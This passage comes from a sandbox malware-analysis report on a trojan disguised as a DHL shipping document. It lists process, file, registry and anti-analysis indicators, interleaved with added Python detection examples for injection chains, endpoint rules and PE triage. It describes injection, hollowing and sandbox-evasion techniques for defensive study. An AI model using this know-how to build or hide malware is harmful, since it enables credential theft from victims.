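        # Optional stages only count inside the window between neighbouring required hits,
        # so an early NtAllocateVirtualMemory for the process's own heap is not credited.
        lo = max((ci for si, ci in positions.items() if si < k), default=-1) + 1
        hi = min((ci for si, ci in positions.items() if si > k), default=len(calls))
        hit = first_index(calls, apis, lo, hi)
        if hit is not None:
            matched[name] = calls[hit]
    return matched, True


def classify(matched):
    """Label the variant from the optional stages that were present (assumed labels)."""
    if "unmap" in matched and "resume" in matched:
        return "process hollowing"
    if matched.get("redirect") == "NtQueueApcThread":
        return "APC injection"
    return "thread context hijack"


def analyse_trace(trace):
    """Group the trace by pid and run the chain matcher on each process."""
    per_pid = defaultdict(list)
    for pid, api in trace:
        per_pid[pid].append(api)
    findings = {}
    for pid, calls in per_pid.items():
        matched, complete = match_chain(calls)
        findings[pid] = {"complete": complete, "stages": matched,
                         "technique": classify(matched) if complete else None}
    return findings


if __name__ == "__main__":
    for pid, f in analyse_trace(SAMPLE_TRACE).items():
        print(pid, f["technique"] or "no injection chain", f["stages"])
```

A chain that breaks (pid 11) is reported as incomplete even though every API of a hollowing sequence is present, which is the property that keeps this from firing on ordinary loaders and debuggers.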
Source: DHL_SHIPPING_DOCUMENT.exe ReversingLabs: Detection: 25%
Source: DHL_SHIPPING_DOCUMENT.exe Virustotal: Detection: 39%
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe File read: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe
Source: DHL_SHIPPING_DOCUMENT.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Process created: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe "C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Process created: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe File created: C:\Users\user\AppData\Local\Temp\nsu5B22.tmp
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@12/5@9/8
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Code function: 0_2_004021AA CoCreateInstance, 0_2_004021AA
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Code function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_00404AB5
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2168:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Command line argument: A 1_2_00410940
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\help.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
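The process tree above (DHL_SHIPPING_DOCUMENT.exe drops eixfhzlwqd.exe into Temp and runs it with a data file, eixfhzlwqd.exe relaunches itself, explorer.exe then spawns C:\Windows\SysWOW64\help.exe, and help.exe opens the Outlook profile key) is the kind of chain an endpoint rule set can catch from process, file and registry telemetry alone, without any knowledge of the payload. The Python below is an added example, not part of this report. It replays those events (constructed from the listing above, with two benign events added) through four rules and returns the alerts. The rule names, the allow-list of legitimate mail clients and the Sysmon-like event shape are assumptions.

```python
"""Endpoint-telemetry rules for the dropper and injection chain in the report (added example)."""
import ntpath

# Constructed Sysmon-like events, in the order the sandbox reports them.
SAMPLE_EVENTS = [
    {"type": "file", "image": r"C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe",
     "path": r"C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe"},
    {"type": "process", "parent": r"C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe",
     "image": r"C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe",
     "cmdline": r'"C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy'},
    {"type": "process", "parent": r"C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe",
     "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"type": "process", "parent": r"C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe",
     "image": r"C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe",
     "cmdline": r"C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe"},
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\SysWOW64\help.exe", "cmdline": r"C:\Windows\SysWOW64\help.exe"},
    {"type": "registry", "image": r"C:\Windows\SysWOW64\help.exe",
     "key": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\"},
    # Two constructed benign events that must not fire.
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r'"C:\Windows\System32\notepad.exe" C:\Users\user\notes.txt'},
    {"type": "registry", "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "key": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\"},
]

MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}   # assumed allow-list for profile access


def command_args(cmdline):
    """Return the argument part of a Windows command line (everything after the image token)."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[end + 1:].strip() if end != -1 else ""
    return cmdline.partition(" ")[2].strip()


def in_temp(path):
    return "\\appdata\\local\\temp\\" in path.lower()


def analyse_events(events):
    """Run the four rules over an ordered event stream; returns a list of alerts."""
    alerts = []
    dropped = {}   # lower-cased file path -> lower-cased image that created it
    for ev in events:
        if ev["type"] == "file":
            dropped[ev["path"].lower()] = ev["image"].lower()
        elif ev["type"] == "process":
            image, parent = ev["image"].lower(), ev["parent"].lower()
            args = command_args(ev["cmdline"])
            # Rule 1: a process executes a file it wrote itself (dropper pattern).
            if dropped.get(image) == parent:
                alerts.append({"rule": "drop-and-execute",
                               "detail": f"{ntpath.basename(parent)} wrote {ev['image']} and then ran it"})
            # Rule 2: a Temp executable starts a second copy of itself (hollowing stage).
            if image == parent and in_temp(image):
                alerts.append({"rule": "temp-self-relaunch",
                               "detail": f"{ev['image']} re-executed itself from Temp"})
            # Rule 3: explorer.exe starts a 32-bit system utility with no arguments
            # (assumption: interactive use of such tools normally carries arguments).
            if (ntpath.basename(parent) == "explorer.exe"
                    and "\\windows\\syswow64\\" in image and not args):
                alerts.append({"rule": "explorer-spawns-syswow64-lolbin",
                               "detail": f"explorer.exe started {ntpath.basename(ev['image'])} with no arguments"})
        elif ev["type"] == "registry":
            key, image = ev["key"].lower(), ev["image"].lower()
            # Rule 4: a non-mail process reads the Outlook profile store (credential access).
            if "\\outlook\\profiles" in key and ntpath.basename(image) not in MAIL_CLIENTS:
                alerts.append({"rule": "mail-profile-access",
                               "detail": f"{ntpath.basename(ev['image'])} read {ev['key']}"})
    return alerts


if __name__ == "__main__":
    for alert in analyse_events(SAMPLE_EVENTS):
        print(f"[{alert['rule']}] {alert['detail']}")
```

Rule 3 is the one to tune per environment: FormBook picks its host process from a list of Windows utilities, so matching on explorer.exe as parent plus an argument-less SysWOW64 image is more durable than matching on help.exe by name.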
Source: DHL_SHIPPING_DOCUMENT.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: eixfhzlwqd.exe, 00000001.00000003.319488467.000000001A150000.00000004.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000001.00000003.314926280.0000000019FC0000.00000004.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000002.357525357.0000000000B1F000.00000040.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000003.320016666.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000003.321428954.000000000086B000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.581390934.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000005.00000003.357421969.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.581390934.0000000002F6F000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: eixfhzlwqd.exe, eixfhzlwqd.exe, 00000003.00000002.357525357.0000000000B1F000.00000040.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000003.320016666.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000003.321428954.000000000086B000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.581390934.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000005.00000003.357421969.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.581390934.0000000002F6F000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: help.pdbGCTL source: eixfhzlwqd.exe, 00000003.00000002.357434868.00000000005E0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: help.pdb source: eixfhzlwqd.exe, 00000003.00000002.357434868.00000000005E0000.00000040.10000000.00040000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Unpacked PE file: 3.2.eixfhzlwqd.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 1_2_00410AA4 push ecx; ret 1_2_00410AB7
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00410928 push ebx; retf 3_2_00410955
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00410933 push ebx; retf 3_2_00410955
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041EA5C push ecx; retf 3_2_0041EA5E
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041AA67 push ebx; retf 3_2_0041AA6C
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0040DB29 pushad ; retf 3_2_0040DB2A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041B4E4 push edi; iretd 3_2_0041B4EA
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00410CFB push esi; ret 3_2_00410D04
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00401DA0 push eax; ret 3_2_00401DA2
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041A6D0 push cs; iretd 3_2_0041A6CF
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041A6AC push cs; iretd 3_2_0041A6CF
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0040A706 push ds; retf 3_2_0040A707
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0040CF3E push ebp; iretd 3_2_0040CF3F
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0040D7FC push eax; iretd 3_2_0040D7FD
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041B79D push esi; ret 3_2_0041B79E
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A7D0D1 push ecx; ret 3_2_00A7D0E4
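Two of the signals above are cheap to reproduce outside a sandbox: the section-rights string the report prints (.text:ER;.rdata:R;.data:W; vs .text:ER;) comes straight from IMAGE_SECTION_HEADER.Characteristics, and the push/ret, push/retf and push/iretd pairs come from a sweep over the code bytes. The Python below is an added example and not the sandbox's own implementation. It packs two constructed section tables (one standing in for the on-disk file, one for the unpacked image at 0x400000), renders them in the report's notation (E, R, W in that order, so a normal read-write data section shows as RW), diffs them, and then runs a linear byte sweep for push-followed-by-return pairs over a constructed code blob. The section contents, the byte blob and the base address are assumptions; the sweep is not a disassembler, so a hit is a triage signal to confirm in a real disassembly.

```python
"""PE section-rights diff and push/ret gadget sweep (added example)."""
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HEADER = struct.Struct("<8sIIIIIIHHI")      # IMAGE_SECTION_HEADER, 40 bytes


def pack_section(name, characteristics, va):
    """Build one IMAGE_SECTION_HEADER (constructed test data, sizes are nominal)."""
    return SECTION_HEADER.pack(name.encode().ljust(8, b"\0"), 0x1000, va, 0x1000, 0x400,
                               0, 0, 0, 0, characteristics)


# Constructed section tables: a typical three-section image on disk, and a
# memory-dumped image whose only remaining section is writable as well as executable.
DISK_TABLE = b"".join([
    pack_section(".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ, 0x1000),
    pack_section(".rdata", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ, 0x2000),
    pack_section(".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE, 0x3000),
])
MEMORY_TABLE = pack_section(
    ".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE, 0x1000)


def parse_sections(table, count):
    """Return {name: characteristics} for `count` headers packed in `table`."""
    sections = {}
    for i in range(count):
        fields = SECTION_HEADER.unpack_from(table, i * SECTION_HEADER.size)
        sections[fields[0].rstrip(b"\0").decode("latin-1")] = fields[9]
    return sections


def rights(ch):
    """Render Characteristics the way the report does: E, R, W in that order."""
    return "".join(flag for bit, flag in ((IMAGE_SCN_MEM_EXECUTE, "E"), (IMAGE_SCN_MEM_READ, "R"),
                                          (IMAGE_SCN_MEM_WRITE, "W")) if ch & bit)


def render(sections):
    return "".join(f"{name}:{rights(ch)};" for name, ch in sections.items())


def diff_sections(on_disk, in_memory):
    """Findings that indicate the image was rewritten in memory (unpacking)."""
    findings = []
    for name in sorted(on_disk.keys() - in_memory.keys()):
        findings.append(f"{name} missing from memory image")
    for name in sorted(in_memory.keys() - on_disk.keys()):
        findings.append(f"{name} added in memory image")
    for name in sorted(on_disk.keys() & in_memory.keys()):
        before, after = rights(on_disk[name]), rights(in_memory[name])
        if before != after:
            findings.append(f"{name} rights changed {before} -> {after}")
    for name, ch in in_memory.items():
        if ch & IMAGE_SCN_MEM_WRITE and ch & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"{name} is writable and executable")
    return findings


# Single-byte push opcodes (register, pushad, segment) and the return family.
PUSH_OPCODES = {0x50: "push eax", 0x51: "push ecx", 0x52: "push edx", 0x53: "push ebx",
                0x54: "push esp", 0x55: "push ebp", 0x56: "push esi", 0x57: "push edi",
                0x60: "pushad", 0x06: "push es", 0x0E: "push cs", 0x16: "push ss", 0x1E: "push ds"}
RET_OPCODES = {0xC3: "ret", 0xC2: "ret imm16", 0xCB: "retf", 0xCA: "retf imm16", 0xCF: "iretd"}

# Constructed code blob: a normal prologue and epilogue around five gadgets.
CODE = bytes.fromhex("55 8B EC 33 C0 51 C3 90 53 CB 68 78 56 34 12 C3 1E CB 57 CF C9 C3")


def find_push_ret(code, base=0x400000):
    """Linear sweep for push-then-return pairs; returns [(address, mnemonic)]."""
    hits, i = [], 0
    while i < len(code) - 1:
        op = code[i]
        if op == 0x68 and i + 5 < len(code) and code[i + 5] in RET_OPCODES:
            target = struct.unpack_from("<I", code, i + 1)[0]    # push imm32; ret acts as jmp imm32
            hits.append((base + i, f"push 0x{target:08x}; {RET_OPCODES[code[i + 5]]}"))
            i += 6
        elif op in PUSH_OPCODES and code[i + 1] in RET_OPCODES:
            hits.append((base + i, f"{PUSH_OPCODES[op]}; {RET_OPCODES[code[i + 1]]}"))
            i += 2
        else:
            i += 1
    return hits


if __name__ == "__main__":
    disk, mem = parse_sections(DISK_TABLE, 3), parse_sections(MEMORY_TABLE, 1)
    print(render(disk), "vs", render(mem))
    for line in diff_sections(disk, mem):
        print(" ", line)
    for addr, text in find_push_ret(CODE):
        print(f"  {addr:08x}  {text}")
```

The prologue push ebp at the start of the blob is correctly ignored because the next byte is not a return opcode; the report's own hits at addresses such as 3_2_0040A706 and 3_2_0041A6AC come from exactly this kind of adjacency and, like these, need a look in the disassembler to tell deliberate control-flow obfuscation from data bytes that happen to decode as push/ret.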
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe File created: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\help.exe TID: 3736 Thread sleep time: -52000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A56A60 rdtscp 3_2_00A56A60
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 881
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 867
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe API coverage: 9.3 %
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405D74
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Code function: 0_2_0040699E FindFirstFileW,FindClose, 0_2_0040699E
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 1_2_004089F8 FindFirstFileExW, 1_2_004089F8
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe API call chain: ExitProcess graph end node
Source: explorer.exe, 00000004.00000003.451856670.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000003.451856670.000000000834F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
Source: explorer.exe, 00000004.00000000.329318562.00000000059F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
Source: explorer.exe, 00000004.00000000.333026756.0000000008394000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000003.448362246.000000000CDE5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&
Source: explorer.exe, 00000004.00000003.573202174.000000000D009000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.447763601.000000000CFFD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.446800528.000000000CFC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.551908862.000000000D009000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
Source: explorer.exe, 00000004.00000003.451856670.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 1_2_0040636B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040636B
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 1_2_0040B0AF GetProcessHeap, 1_2_0040B0AF
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A56A60 rdtscp 3_2_00A56A60
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Process token adjusted: Debug
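The indicator lines above (SetErrorMode flags, the long sleep in help.exe, the rdtscp timing read, the VMware device strings, IsDebuggerPresent/GetProcessHeap, and the many fs:[00000030h] PEB reads that follow) are useful in aggregate, not one at a time. The script below is an added triage example, not part of the Joe Sandbox report or of the sample: it parses "Source: ... <field>: <value>" lines of this format, strips the report's "Jump to behavior" link text, buckets each line into an evasion category, ranks functions by how many PEB reads they contain, and decodes the error-mode flags into the SetErrorMode argument. The category names and the SAMPLE_LINES constant are constructed for the example; the nine sample lines are copied from this report.

```python
"""Triage helper for Joe Sandbox-style behaviour indicator lines.

Added example, not part of the original report or of Joe Sandbox. It parses
the 'Source: ...' lines reproduced on this page, buckets them into evasion
categories and ranks the functions that read the PEB most often.
"""
import re
from collections import Counter, defaultdict

# Constructed sample: nine lines copied from this report (analysis ID 830431).
SAMPLE_LINES = r"""
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe TID: 3736 Thread sleep time: -52000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A56A60 rdtscp 3_2_00A56A60
Source: explorer.exe, 00000004.00000003.451856670.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 1_2_0040636B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040636B
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 1_2_0040B0AF GetProcessHeap, 1_2_0040B0AF
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h] 3_2_00A520A0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h] 3_2_00A520A0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5F0BF mov ecx, dword ptr fs:[00000030h] 3_2_00A5F0BF
"""

# Field names seen in this report; the source (a path or a list of memory dumps) precedes them.
FIELDS = ("Code function", "Process information set", "TID", "Last function",
          "Binary or memory string", "Process token adjusted", "Window / User API",
          "API coverage", "Process information queried")
LINE_RE = re.compile(
    r"^Source: (?P<source>.+?) (?P<field>" + "|".join(re.escape(f) for f in FIELDS) + r"): ?(?P<value>.*)$"
)
# Code-function values repeat the function id at both ends: "<id> <body> <id>".
CODE_FN_RE = re.compile(r"^(?P<fn>\d+_\d+_[0-9A-Fa-f]{8}) (?P<body>.+?),? ?(?P=fn)$")
VM_STRING_RE = re.compile(r"vmware|vbox|virtualbox|hyper-v|qemu|xen", re.I)

SEM_FLAGS = {                              # SetErrorMode flag values from winbase.h
    "FAILCRITICALERRORS": 0x0001,
    "NOGPFAULTERRORBOX": 0x0002,
    "NOALIGNMENTFAULTEXCEPT": 0x0004,
    "NOOPENFILEERRORBOX": 0x8000,
}


def parse_line(raw):
    """Split one indicator line into source, field, value and (if any) function id."""
    line = re.sub(r"\s+Jump to behavior$", "", raw.strip())   # drop the report's link text
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["fn"] = None
    if rec["field"] == "Code function":
        c = CODE_FN_RE.match(rec["value"])
        if c:
            rec["fn"] = c.group("fn")
            rec["value"] = c.group("body")
    return rec


def classify(rec):
    """Bucket a parsed record into an evasion category, or None if it is not one."""
    v = rec["value"]
    if rec["field"] == "Code function":
        if "fs:[00000030h]" in v:            # TEB+0x30 is the PEB pointer on 32-bit Windows;
            return "peb_read"                # BeingDebugged, NtGlobalFlag and heap flags live there
        if re.search(r"\brdtscp?\b", v):
            return "timing_check"
        if "IsDebuggerPresent" in v or "GetProcessHeap" in v:
            return "debugger_api"
        return None
    if rec["field"] in ("TID", "Last function") and ("sleep" in v.lower() or "delayed" in v.lower()):
        return "sleep_evasion"
    if rec["field"] == "Process information set" and "ERRORBOX" in v:
        return "error_mode"
    if rec["field"] == "Binary or memory string" and VM_STRING_RE.search(v):
        return "vm_artifact_string"
    return None


def triage(text):
    """Return {category: Counter keyed by 'source@function' (or just source)}."""
    buckets = defaultdict(Counter)
    for raw in text.splitlines():
        rec = parse_line(raw) if raw.strip() else None
        if rec is None:
            continue
        cat = classify(rec)
        if cat is None:
            continue
        key = f"{rec['source']}@{rec['fn']}" if rec["fn"] else rec["source"]
        buckets[cat][key] += 1
    return dict(buckets)


def peb_read_hotspots(text):
    """Functions ranked by PEB-read count: where to start looking for anti-debug checks."""
    counts = Counter()
    for raw in text.splitlines():
        rec = parse_line(raw) if raw.strip() else None
        if rec and rec["fn"] and classify(rec) == "peb_read":
            counts[rec["fn"]] += 1
    return counts.most_common()


def decode_error_mode(value):
    """'NOGPFAULTERRORBOX | NOOPENFILEERRORBOX' -> 0x8002, the SetErrorMode argument."""
    mode = 0
    for name in (n.strip() for n in value.split("|")):
        mode |= SEM_FLAGS[name]
    return mode


if __name__ == "__main__":
    for cat, counter in sorted(triage(SAMPLE_LINES).items()):
        print(f"{cat:20s} {sum(counter.values()):3d}  {dict(counter)}")
    print("PEB-read hotspots:", peb_read_hotspots(SAMPLE_LINES))
    print("help.exe error mode: 0x%04X" % decode_error_mode("NOGPFAULTERRORBOX | NOOPENFILEERRORBOX"))
```

Two caveats when reading the output against this report. The VMware SCSI strings come from explorer.exe memory dumps (.sdmp), that is, from the system process the payload was injected into, so they show that the analysis host is a VMware guest rather than proving the sample fingerprints it; the fs:[00000030h] reads inside eixfhzlwqd.exe are the stronger anti-analysis signal and the hotspot ranking tells you which functions to open first. The error mode 0x8002 (SEM_NOGPFAULTERRORBOX | SEM_NOOPENFILEERRORBOX) set in help.exe suppresses the crash and missing-file dialogs, so a hollowed process that faults dies without any visible window.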
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h] 3_2_00A520A0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h] 3_2_00A520A0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h] 3_2_00A520A0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h] 3_2_00A520A0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h] 3_2_00A520A0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h] 3_2_00A520A0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A690AF mov eax, dword ptr fs:[00000030h] 3_2_00A690AF
